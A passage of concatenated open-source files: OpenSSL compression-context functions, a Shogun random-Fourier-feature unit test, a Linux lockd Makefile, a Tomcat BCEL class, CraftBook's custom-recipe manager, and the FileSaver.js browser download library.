OPENSSL_free(ret);
ret=NULL;
}
return(ret);
}
void COMP_CTX_free(COMP_CTX *ctx)
{
if(ctx == NULL)
return;
if (ctx->meth->finish != NULL)
ctx->meth->finish(ctx);
OPENSSL_free(ctx);
}
int COMP_compress_block(COMP_CTX *ctx, unsigned char *out, int olen,
unsigned char *in, int ilen)
{
int ret;
if (ctx->meth->compress == NULL)
{
		/* this COMP_METHOD provides no compress callback */
return(-1);
}
ret=ctx->meth->compress(ctx,out,olen,in,ilen);
if (ret > 0)
{
ctx->compress_in+=ilen;
ctx->compress_out+=ret;
}
return(ret);
}
int COMP_expand_block(COMP_CTX *ctx, unsigned char *out, int olen,
unsigned char *in, int ilen)
{
int ret;
if (ctx->meth->expand == NULL)
{
		/* this COMP_METHOD provides no expand callback */
return(-1);
}
ret=ctx->meth->expand(ctx,out,olen,in,ilen);
if (ret > 0)
{
ctx->expand_in+=ilen;
ctx->expand_out+=ret;
}
return(ret);
}
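/*
 * Editor's sketch (not part of the original file): how the entry points
 * above fit together, assuming the zlib method COMP_zlib() from this same
 * library is compiled in. Guarded out so the translation unit stays a
 * plain library source file.
 */
#ifdef COMP_USAGE_SKETCH
#include <stdio.h>
#include <string.h>
int main(void)
	{
	unsigned char in[] = "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa";
	unsigned char out[128], back[128];
	int clen, plen;
	COMP_CTX *ctx = COMP_CTX_new(COMP_zlib());

	if (ctx == NULL)
		return(1);
	/* one context carries both directions; SSL uses separate contexts */
	clen = COMP_compress_block(ctx, out, (int)sizeof(out),
	                           in, (int)strlen((char *)in));
	plen = COMP_expand_block(ctx, back, (int)sizeof(back), out, clen);
	printf("%d -> %d -> %d bytes\n", (int)strlen((char *)in), clen, plen);
	COMP_CTX_free(ctx);
	return(0);
	}
#endif /* COMP_USAGE_SKETCH */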
| {
"pile_set_name": "Github"
} |
/*
* This software is distributed under BSD 3-clause license (see LICENSE file).
*
* Author: Nanubala Gnana Sai
*/
#include <gtest/gtest.h>
#include <shogun/features/DenseFeatures.h>
#include <shogun/kernel/GaussianKernel.h>
#include <shogun/lib/SGVector.h>
#include <shogun/mathematics/linalg/LinalgNamespace.h>
#include <shogun/preprocessor/RFFPreprocessor.h>
using namespace shogun;
using namespace random;
class RFFPreprocessorTest : public ::testing::Test
{
public:
virtual void SetUp()
{
SGMatrix<float64_t> mat(num_features, num_vectors);
linalg::range_fill(mat, 1.0);
auto gauss = std::make_shared<GaussianKernel>(width);
auto features = std::make_shared<DenseFeatures<float64_t>>(mat);
preproc = std::make_shared<RFFPreprocessor>();
preproc->put(kSeed, seed);
preproc->set_kernel(gauss);
preproc->set_dim_output(target_dim);
preproc->fit(features);
}
virtual void TearDown()
{
}
protected:
const int32_t seed = 100;
const index_t num_vectors = 5;
const index_t num_features = 3;
const index_t target_dim = 400;
const float64_t width = 1.5;
const float64_t epsilon = 0.04;
std::shared_ptr<RFFPreprocessor> preproc;
};
TEST_F(RFFPreprocessorTest, apply)
{
SGMatrix<float64_t> matrix(num_features, 2);
linalg::range_fill(matrix, 1.0);
auto feats = std::make_shared<DenseFeatures<float64_t>>(matrix);
auto preprocessed = preproc->transform(feats)
->as<DenseFeatures<float64_t>>()
->get_feature_matrix();
auto result_rff =
linalg::dot(preprocessed.get_column(0), preprocessed.get_column(1));
auto gauss_kernel = std::make_shared<GaussianKernel>();
gauss_kernel->set_width(width);
gauss_kernel->init(feats, feats);
auto result_kernel = gauss_kernel->kernel(0, 1);
EXPECT_NEAR(result_rff, result_kernel, epsilon);
}
TEST_F(RFFPreprocessorTest, apply_to_vectors)
{
SGVector<float64_t> vec1 = {1.0, 2.0, 3.0};
SGVector<float64_t> vec2 = {4.0, 5.0, 6.0};
auto mat = SGMatrix<float64_t>(num_features, 2);
linalg::range_fill(mat, 1.0);
auto processed1 = preproc->apply_to_feature_vector(vec1);
auto processed2 = preproc->apply_to_feature_vector(vec2);
auto result_rff = linalg::dot(processed1, processed2);
auto gauss_kernel = std::make_shared<GaussianKernel>();
auto feats = std::make_shared<DenseFeatures<float64_t>>(mat);
gauss_kernel->set_width(width);
gauss_kernel->init(feats, feats);
auto result_kernel = gauss_kernel->kernel(0, 1);
EXPECT_NEAR(result_rff, result_kernel, epsilon);
}
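/*
 * Editor's sketch (not part of the original test): the Rahimi-Rechts
 * random-Fourier-feature construction these tests exercise, written out in
 * plain C. ASSUMPTION: Shogun's GaussianKernel is parameterised as
 * k(x,y) = exp(-||x-y||^2 / width), so frequency rows are drawn from
 * N(0, (2/width) I). Guarded out of the build.
 */
#if 0
#include <math.h>
#include <stdio.h>
#include <stdlib.h>

#define DIM 3
#define D   400                       /* target_dim in the fixture above */

static double gauss01(void) {         /* Box-Muller sample from N(0, 1) */
    double u1 = (rand() + 1.0) / (RAND_MAX + 2.0);
    double u2 = (rand() + 1.0) / (RAND_MAX + 2.0);
    return sqrt(-2.0 * log(u1)) * cos(2.0 * M_PI * u2);
}

int main(void) {
    const double width = 1.5;
    static double W[D][DIM], b[D];
    const double x[DIM] = {1, 2, 3}, y[DIM] = {4, 5, 6};
    double dot = 0.0, dist2 = 0.0;

    for (int i = 0; i < D; i++) {     /* random frequencies and phases */
        for (int j = 0; j < DIM; j++)
            W[i][j] = gauss01() * sqrt(2.0 / width);
        b[i] = 2.0 * M_PI * rand() / (double)RAND_MAX;
    }
    for (int i = 0; i < D; i++) {     /* z(x).z(y), z = sqrt(2/D) cos(Wx+b) */
        double wx = b[i], wy = b[i];
        for (int j = 0; j < DIM; j++) { wx += W[i][j] * x[j]; wy += W[i][j] * y[j]; }
        dot += (2.0 / D) * cos(wx) * cos(wy);
    }
    for (int j = 0; j < DIM; j++)
        dist2 += (x[j] - y[j]) * (x[j] - y[j]);
    printf("rff %.4f vs kernel %.4f\n", dot, exp(-dist2 / width));
    return 0;
}
#endif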
| {
"pile_set_name": "Github"
} |
#
# Makefile for the linux lock manager stuff
#
obj-$(CONFIG_LOCKD) += lockd.o
lockd-objs-y := clntlock.o clntproc.o clntxdr.o host.o svc.o svclock.o \
svcshare.o svcproc.o svcsubs.o mon.o xdr.o grace.o
lockd-objs-$(CONFIG_LOCKD_V4) += clnt4xdr.o xdr4.o svc4proc.o
lockd-objs := $(lockd-objs-y)
| {
"pile_set_name": "Github"
} |
/*
* Licensed to the Apache Software Foundation (ASF) under one or more
* contributor license agreements. See the NOTICE file distributed with
* this work for additional information regarding copyright ownership.
* The ASF licenses this file to You under the Apache License, Version 2.0
* (the "License"); you may not use this file except in compliance with
* the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*
*/
package org.apache.tomcat.util.bcel.classfile;
import java.io.DataInput;
import java.io.IOException;
import org.apache.tomcat.util.bcel.Const;
/**
* This class is derived from the abstract {@link Constant}
* and represents a reference to a float object.
*
* @see Constant
*/
public final class ConstantFloat extends Constant {
private final float bytes;
/**
* Initialize instance from file data.
*
* @param file Input stream
* @throws IOException
*/
ConstantFloat(final DataInput file) throws IOException {
super(Const.CONSTANT_Float);
this.bytes = file.readFloat();
}
/**
* @return data, i.e., 4 bytes.
*/
public float getBytes() {
return bytes;
}
}
| {
"pile_set_name": "Github"
} |
package com.sk89q.craftbook.mechanics.crafting;
import java.io.IOException;
import java.util.*;
import com.sk89q.craftbook.bukkit.util.CraftBookBukkitUtil;
import org.bukkit.inventory.ItemStack;
import com.sk89q.craftbook.bukkit.CraftBookPlugin;
import com.sk89q.craftbook.util.ItemSyntax;
import com.sk89q.craftbook.util.ItemUtil;
import com.sk89q.craftbook.util.RegexUtil;
import com.sk89q.util.yaml.YAMLProcessor;
public class RecipeManager {
public static RecipeManager INSTANCE;
private Set<Recipe> recipes;
protected YAMLProcessor config;
public RecipeManager(YAMLProcessor config) {
INSTANCE = this;
this.config = config;
load();
}
public void load() {
recipes = new LinkedHashSet<>();
if (config == null) {
CraftBookPlugin.logger().severe("Failure loading recipes! Config is null!");
return; // If the config is null, it can't continue.
}
try {
config.load();
} catch (IOException e) {
CraftBookPlugin.logger().severe("Corrupt Custom Crafting crafting-recipes.yml File! Make sure that the correct syntax has been used, and that there are no tabs!");
e.printStackTrace();
}
config.setHeader(
"# CraftBook Custom Recipes. CraftBook Version: " + CraftBookPlugin.inst().getDescription().getVersion(),
"# For more information on setting up custom recipes, see the wiki:",
"# " + CraftBookPlugin.getWikiDomain() + "/Custom_crafting",
"",
"");
List<String> keys = config.getKeys("crafting-recipes");
if (keys != null) {
for (String key : keys) {
try {
recipes.add(new Recipe(key, config));
} catch (InvalidCraftingException e) {
CraftBookBukkitUtil.printStacktrace(e);
}
}
}
}
public void disable() {
INSTANCE = null;
}
public void save() {
if (config == null) {
CraftBookPlugin.logger().severe("Failure saving recipes! Config is null!");
return; // If the config is null, it can't continue.
}
config.clear();
config.setHeader(
"# CraftBook Custom Recipes. CraftBook Version: " + CraftBookPlugin.inst().getDescription().getVersion(),
"# For more information on setting up custom recipes, see the wiki:",
"# " + CraftBookPlugin.getWikiDomain() + "/Custom_crafting",
"",
"");
config.addNode("crafting-recipes");
for(Recipe recipe : recipes)
recipe.save();
config.save();
load();
}
public Collection<Recipe> getRecipes() {
return recipes;
}
public void addRecipe(Recipe rec) {
recipes.add(rec);
save();
}
public boolean removeRecipe(String name) {
Iterator<Recipe> recs = recipes.iterator();
while(recs.hasNext()) {
Recipe rec = recs.next();
if(rec.getId().equalsIgnoreCase(name)) {
recs.remove();
save();
return true;
}
}
return false;
}
public final class Recipe {
private final String id;
private RecipeType type;
private List<CraftingItemStack> ingredients;
private LinkedHashMap<CraftingItemStack, Character> items;
private CraftingItemStack result;
private List<String> shape;
private float experience;
private int cookTime;
@Override
public boolean equals(Object o) {
if(o instanceof Recipe) {
if(shape != null)
if(shape.size() != ((Recipe)o).shape.size())
return false;
if(ingredients != null) {
if(ingredients.size() != ((Recipe)o).ingredients.size())
return false;
List<CraftingItemStack> stacks = new ArrayList<>(ingredients);
for(CraftingItemStack st : ((Recipe)o).ingredients) {
if(stacks.size() <= 0)
return false;
Iterator<CraftingItemStack> it = stacks.iterator();
while(it.hasNext()) {
CraftingItemStack sta = it.next();
if(st.equals(sta)) {
it.remove();
break;
}
}
}
if(stacks.size() > 0)
return false;
}
if(items != null) {
if(items.size() != ((Recipe)o).items.size())
return false;
List<CraftingItemStack> stacks = new ArrayList<>(items.keySet());
for(CraftingItemStack st : ((Recipe)o).items.keySet()) {
if(stacks.size() <= 0)
return false;
Iterator<CraftingItemStack> it = stacks.iterator();
while(it.hasNext()) {
CraftingItemStack sta = it.next();
if(st.equals(sta)) {
it.remove();
break;
}
}
}
if(stacks.size() > 0)
return false;
}
if(advancedData != null)
if(advancedData.size() != ((Recipe)o).advancedData.size())
return false;
return ((Recipe) o).id.equals(id) && type == ((Recipe)o).type && result.equals(((Recipe)o).result);
}
else
return false;
}
@Override
public int hashCode() {
int ret = id.hashCode();
if(ingredients != null)
ret += ingredients.hashCode();
else if (items != null)
ret += items.hashCode();
ret += result.hashCode();
if(shape != null)
ret += shape.hashCode();
return ret + advancedData.hashCode();
}
public boolean hasAdvancedData() {
if(ingredients != null) {
for(CraftingItemStack stack : ingredients)
if(stack.hasAdvancedData())
return true;
}
if(items != null) {
for(CraftingItemStack stack : items.keySet())
if(stack.hasAdvancedData())
return true;
}
return result.hasAdvancedData() || !advancedData.isEmpty();
}
private Recipe(String id, YAMLProcessor config) throws InvalidCraftingException {
this.id = id;
ingredients = new ArrayList<>();
items = new LinkedHashMap<>();
load();
}
public Recipe(String id, RecipeType type, LinkedHashMap<CraftingItemStack, Character> items, List<String> shape, CraftingItemStack result, HashMap<String, Object> advancedData) throws InvalidCraftingException {
this.id = id;
this.type = type;
this.items = items;
this.shape = shape;
this.result = result;
this.advancedData = advancedData;
}
public Recipe(String id, RecipeType type, List<CraftingItemStack> ingredients, CraftingItemStack result, HashMap<String, Object> advancedData) throws InvalidCraftingException {
this.id = id;
this.type = type;
this.ingredients = ingredients;
this.result = result;
this.advancedData = advancedData;
}
private void load() throws InvalidCraftingException {
type = RecipeType.getTypeFromName(config.getString("crafting-recipes." + id + ".type"));
if (type != RecipeType.SHAPED) {
ingredients = getItems("crafting-recipes." + id + ".ingredients");
if (type == RecipeType.FURNACE) {
cookTime = config.getInt("crafting-recipes." + id + ".cook-time", 200);
experience = (float) config.getDouble("crafting-recipes." + id + ".experience", 0.0);
}
} else {
items = getShapeIngredients("crafting-recipes." + id + ".ingredients");
shape = config.getStringList("crafting-recipes." + id + ".shape", Collections.singletonList(""));
}
Iterator<CraftingItemStack> iterator = getItems("crafting-recipes." + id + ".results").iterator();
if(iterator.hasNext())
result = iterator.next();
else
throw new InvalidCraftingException("Result is invalid in recipe: "+ id);
if(iterator.hasNext()) {
ArrayList<CraftingItemStack> extraResults = new ArrayList<>();
while(iterator.hasNext())
extraResults.add(iterator.next());
addAdvancedData("extra-results", extraResults);
}
String permNode = config.getString("crafting-recipes." + id + ".permission-node", null);
if (permNode != null)
addAdvancedData("permission-node", permNode);
String permError = config.getString("crafting-recipes." + id + ".permission-error", null);
if (permError != null)
addAdvancedData("permission-error", permError);
List<String> actions = config.getKeys("crafting-recipes." + id + ".craft-actions");
if(actions != null && !actions.isEmpty()) {
for(String s : actions) {
if(s.equalsIgnoreCase("commands-console"))
addAdvancedData("commands-console", config.getStringList("crafting-recipes." + id + ".craft-actions." + s, new ArrayList<>()));
else if(s.equalsIgnoreCase("commands-player"))
addAdvancedData("commands-player", config.getStringList("crafting-recipes." + id + ".craft-actions." + s, new ArrayList<>()));
}
}
}
@SuppressWarnings("unchecked")
public void save() {
config.addNode("crafting-recipes." + id);
config.setProperty("crafting-recipes." + id + ".type", type.name);
if(type != RecipeType.SHAPED) {
LinkedHashMap<String, Integer> resz = new LinkedHashMap<>();
for(CraftingItemStack stack : ingredients) {
resz.put(stack.toString() + ' ', stack.getItemStack().getAmount());
}
config.setProperty("crafting-recipes." + id + ".ingredients", resz);
if (type == RecipeType.FURNACE) {
config.setProperty("crafting-recipes." + id + ".cook-time", cookTime);
config.setProperty("crafting-recipes." + id + ".experience", experience);
}
} else {
LinkedHashMap<String, Character> resz = new LinkedHashMap<>();
for(Map.Entry<CraftingItemStack, Character> craftingItemStackCharacterEntry : items.entrySet())
resz.put(craftingItemStackCharacterEntry.getKey().toString() + ' ', craftingItemStackCharacterEntry.getValue());
config.setProperty("crafting-recipes." + id + ".ingredients", resz);
config.setProperty("crafting-recipes." + id + ".shape", shape);
}
LinkedHashMap<String, Integer> resz = new LinkedHashMap<>();
resz.put(result.toString() + ' ', result.getItemStack().getAmount());
if(hasAdvancedData("extra-results")) {
ArrayList<CraftingItemStack> extraResults =
new ArrayList<>((Collection<? extends CraftingItemStack>) getAdvancedData("extra-results"));
for(CraftingItemStack s : extraResults)
resz.put(s.toString() + ' ', s.getItemStack().getAmount());
}
config.setProperty("crafting-recipes." + id + ".results", resz);
if(hasAdvancedData("permission-node"))
config.setProperty("crafting-recipes." + id + ".permission-node", getAdvancedData("permission-node"));
if(hasAdvancedData("permission-error"))
config.setProperty("crafting-recipes." + id + ".permission-error", getAdvancedData("permission-error"));
if(hasAdvancedData("commands-player") || hasAdvancedData("commands-console")) {
config.addNode("crafting-recipes." + id + ".craft-actions");
if(hasAdvancedData("commands-player"))
config.setProperty("crafting-recipes." + id + ".craft-actions.commands-player", getAdvancedData("commands-player"));
if(hasAdvancedData("commands-console"))
config.setProperty("crafting-recipes." + id + ".craft-actions.commands-console", getAdvancedData("commands-console"));
}
}
private LinkedHashMap<CraftingItemStack, Character> getShapeIngredients(String path) {
LinkedHashMap<CraftingItemStack, Character> items = new LinkedHashMap<>();
try {
for (String item : config.getKeys(path)) {
ItemStack stack = ItemUtil.makeItemValid(ItemSyntax.getItem(RegexUtil.PERCENT_PATTERN.split(item.trim())[0]));
if (stack != null) {
stack.setAmount(1);
CraftingItemStack itemStack = new CraftingItemStack(stack);
if(RegexUtil.PERCENT_PATTERN.split(item).length > 1)
itemStack.addAdvancedData("chance", Double.parseDouble(RegexUtil.PERCENT_PATTERN.split(item.trim())[1]));
items.put(itemStack, config.getString(path + '.' + item, "a").charAt(0));
}
}
} catch (Exception e) {
CraftBookPlugin.inst().getLogger().severe("An error occurred while generating ingredients for recipe: " + id);
CraftBookBukkitUtil.printStacktrace(e);
}
return items;
}
private List<CraftingItemStack> getItems(String path) {
List<CraftingItemStack> items = new ArrayList<>();
try {
for (Object oitem : config.getKeys(path)) {
String okey = String.valueOf(oitem);
String item = okey.trim();
ItemStack stack = ItemUtil.makeItemValid(ItemSyntax.getItem(RegexUtil.PERCENT_PATTERN.split(item)[0]));
if (stack != null) {
stack.setAmount(config.getInt(path + '.' + okey, 1));
CraftingItemStack itemStack = new CraftingItemStack(stack);
if(RegexUtil.PERCENT_PATTERN.split(item).length > 1)
itemStack.addAdvancedData("chance", Double.parseDouble(RegexUtil.PERCENT_PATTERN.split(item)[1]));
items.add(itemStack);
}
}
} catch (Exception e) {
CraftBookPlugin.inst().getLogger().severe("An error occurred while generating ingredients for recipe: " + id);
CraftBookBukkitUtil.printStacktrace(e);
}
return items;
}
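// Note: both item parsers above split each config key on RegexUtil.PERCENT_PATTERN,
// so a key such as "diamond%25" (assuming the pattern matches '%') yields the
// item plus a "chance" advanced-data entry of 25.0.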
public String getId() {
return id;
}
public RecipeType getType() {
return type;
}
public List<CraftingItemStack> getIngredients() {
return ingredients;
}
public String[] getShape() {
return shape.toArray(new String[shape.size()]);
}
public LinkedHashMap<CraftingItemStack, Character> getShapedIngredients() {
return items;
}
public CraftingItemStack getResult() {
return result;
}
// Furnace
public float getExperience() {
return this.experience;
}
public void setExperience(float experience) {
this.experience = experience;
}
public int getCookTime() {
return this.cookTime;
}
public void setCookTime(int cookTime) {
this.cookTime = cookTime;
}
//Advanced data
private HashMap<String, Object> advancedData = new HashMap<>();
public boolean hasAdvancedData(String key) {
return advancedData.containsKey(key);
}
public Object getAdvancedData(String key) {
return advancedData.get(key);
}
public void addAdvancedData(String key, Object data) {
CraftBookPlugin.logDebugMessage("Adding advanced data of type: " + key + " to an ItemStack! {" + String.valueOf(data) + '}',
"advanced-data.init");
advancedData.put(key, data);
}
public HashMap<String,Object> getAdvancedDataMap() {
return advancedData;
}
}
public enum RecipeType {
SHAPELESS("Shapeless"), FURNACE("Furnace"), SHAPED("Shaped");
private final String name;
RecipeType(String name) {
this.name = name;
}
public String getName() {
return name;
}
public static RecipeType getTypeFromName(String name) {
if (name == null) return SHAPELESS; // no 'type' key in the config; use the same fallback as below
if(name.equalsIgnoreCase("Shaped2x2") || name.equalsIgnoreCase("Shaped3x3")) {
CraftBookPlugin.logger().warning("You are using the deprecated recipe type '" + name + "'; we recommend changing it to 'shaped'!");
return SHAPED;
}
for (RecipeType t : RecipeType.values()) {
if (t.name.equalsIgnoreCase(name))
return t;
}
return SHAPELESS; // Default to shapeless
}
}
}
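/*
 * Minimal construction sketch (illustrative values; Recipe and RecipeType are
 * the nested types above, so qualify them with the enclosing class name where
 * needed):
 *
 *   List<CraftingItemStack> ingredients = new ArrayList<>();
 *   ingredients.add(new CraftingItemStack(new ItemStack(Material.DIAMOND)));
 *   Recipe recipe = new Recipe("diamond-block", RecipeType.SHAPELESS, ingredients,
 *           new CraftingItemStack(new ItemStack(Material.DIAMOND_BLOCK)),
 *           new HashMap<>());
 *
 * Only the private YAMLProcessor constructor wires up the config field, so
 * save() is only meaningful for recipes that were loaded from configuration.
 */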
/* FileSaver.js
* A saveAs() FileSaver implementation.
* 1.3.2
* 2016-06-16 18:25:19
*
* By Eli Grey, http://eligrey.com
* License: MIT
* See https://github.com/eligrey/FileSaver.js/blob/master/LICENSE.md
*/
/*global self */
/*jslint bitwise: true, indent: 4, laxbreak: true, laxcomma: true, smarttabs: true, plusplus: true */
/*! @source http://purl.eligrey.com/github/FileSaver.js/blob/master/FileSaver.js */
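/* Typical usage sketch (file name and contents here are illustrative):
 *
 *   var blob = new Blob(["Hello, world!"], {type: "text/plain;charset=utf-8"});
 *   saveAs(blob, "hello.txt");
 *
 * A truthy third argument (no_auto_bom) skips the automatic UTF-8 BOM that
 * auto_bom() below would otherwise prepend for text-like types.
 */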
var saveAs = saveAs || (function(view) {
"use strict";
// IE <10 is explicitly unsupported
if (typeof view === "undefined" || typeof navigator !== "undefined" && /MSIE [1-9]\./.test(navigator.userAgent)) {
return;
}
var
doc = view.document
// only get URL when necessary in case Blob.js hasn't overridden it yet
, get_URL = function() {
return view.URL || view.webkitURL || view;
}
, save_link = doc.createElementNS("http://www.w3.org/1999/xhtml", "a")
, can_use_save_link = "download" in save_link
, click = function(node) {
var event = new MouseEvent("click");
node.dispatchEvent(event);
}
, is_safari = /constructor/i.test(view.HTMLElement)
, is_chrome_ios = /CriOS\/[\d]+/.test(navigator.userAgent)
, throw_outside = function(ex) {
(view.setImmediate || view.setTimeout)(function() {
throw ex;
}, 0);
}
, force_saveable_type = "application/octet-stream"
// the Blob API is fundamentally broken as there is no "downloadfinished" event to subscribe to
, arbitrary_revoke_timeout = 1000 * 40 // in ms
, revoke = function(file) {
var revoker = function() {
if (typeof file === "string") { // file is an object URL
get_URL().revokeObjectURL(file);
} else { // file is a File
file.remove();
}
};
setTimeout(revoker, arbitrary_revoke_timeout);
}
, dispatch = function(filesaver, event_types, event) {
event_types = [].concat(event_types);
var i = event_types.length;
while (i--) {
var listener = filesaver["on" + event_types[i]];
if (typeof listener === "function") {
try {
listener.call(filesaver, event || filesaver);
} catch (ex) {
throw_outside(ex);
}
}
}
}
, auto_bom = function(blob) {
// prepend BOM for UTF-8 XML and text/* types (including HTML)
// note: your browser will automatically convert UTF-16 U+FEFF to EF BB BF
if (/^\s*(?:text\/\S*|application\/xml|\S*\/\S*\+xml)\s*;.*charset\s*=\s*utf-8/i.test(blob.type)) {
return new Blob([String.fromCharCode(0xFEFF), blob], {type: blob.type});
}
return blob;
}
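// e.g. a Blob typed "application/xml;charset=utf-8" gets U+FEFF prepended,
// while "application/octet-stream" passes through auto_bom untouched.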
, FileSaver = function(blob, name, no_auto_bom) {
if (!no_auto_bom) {
blob = auto_bom(blob);
}
// First try a.download, then web filesystem, then object URLs
var
filesaver = this
, type = blob.type
, force = type === force_saveable_type
, object_url
, dispatch_all = function() {
dispatch(filesaver, "writestart progress write writeend".split(" "));
}
// on any filesys errors revert to saving with object URLs
, fs_error = function() {
if ((is_chrome_ios || (force && is_safari)) && view.FileReader) {
// Safari doesn't allow downloading of blob urls
var reader = new FileReader();
reader.onloadend = function() {
var url = is_chrome_ios ? reader.result : reader.result.replace(/^data:[^;]*;/, 'data:attachment/file;');
var popup = view.open(url, '_blank');
if(!popup) view.location.href = url;
url=undefined; // release reference before dispatching
filesaver.readyState = filesaver.DONE;
dispatch_all();
};
reader.readAsDataURL(blob);
filesaver.readyState = filesaver.INIT;
return;
}
// don't create more object URLs than needed
if (!object_url) {
object_url = get_URL().createObjectURL(blob);
}
if (force) {
view.location.href = object_url;
} else {
var opened = view.open(object_url, "_blank");
if (!opened) {
// Apple does not allow window.open, see https://developer.apple.com/library/safari/documentation/Tools/Conceptual/SafariExtensionGuide/WorkingwithWindowsandTabs/WorkingwithWindowsandTabs.html
view.location.href = object_url;
}
}
filesaver.readyState = filesaver.DONE;
dispatch_all();
revoke(object_url);
}
;
filesaver.readyState = filesaver.INIT;
if (can_use_save_link) {
object_url = get_URL().createObjectURL(blob);
setTimeout(function() {
save_link.href = object_url;
save_link.download = name;
click(save_link);
dispatch_all();
revoke(object_url);
filesaver.readyState = filesaver.DONE;
});
return;
}
fs_error();
}
, FS_proto = FileSaver.prototype
, saveAs = function(blob, name, no_auto_bom) {
return new FileSaver(blob, name || blob.name || "download", no_auto_bom);
}
;
// IE 10+ (native saveAs)
if (typeof navigator !== "undefined" && navigator.msSaveOrOpenBlob) {
return function(blob, name, no_auto_bom) {
name = name || blob.name || "download";
if (!no_auto_bom) {
blob = auto_bom(blob);
}
return navigator.msSaveOrOpenBlob(blob, name);
};
}
FS_proto.abort = function(){};
FS_proto.readyState = FS_proto.INIT = 0;
FS_proto.WRITING = 1;
FS_proto.DONE = 2;
FS_proto.error =
FS_proto.onwritestart =
FS_proto.onprogress =
FS_proto.onwrite =
FS_proto.onabort =
FS_proto.onerror =
FS_proto.onwriteend =
null;
return saveAs;
}(
typeof self !== "undefined" && self
|| typeof window !== "undefined" && window
|| this.content
));
// `self` is undefined in Firefox for Android content script context
// while `this` is nsIContentFrameMessageManager
// with an attribute `content` that corresponds to the window
if (typeof module !== "undefined" && module.exports) {
module.exports.saveAs = saveAs;
} else if (typeof define === "function" && define.amd) { // register as an AMD module only when an AMD loader is present
define([], function() {
return saveAs;
});
}
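// With the CommonJS branch above this can be consumed as, for example
// (package name assumed):
//   var saveAs = require("file-saver").saveAs;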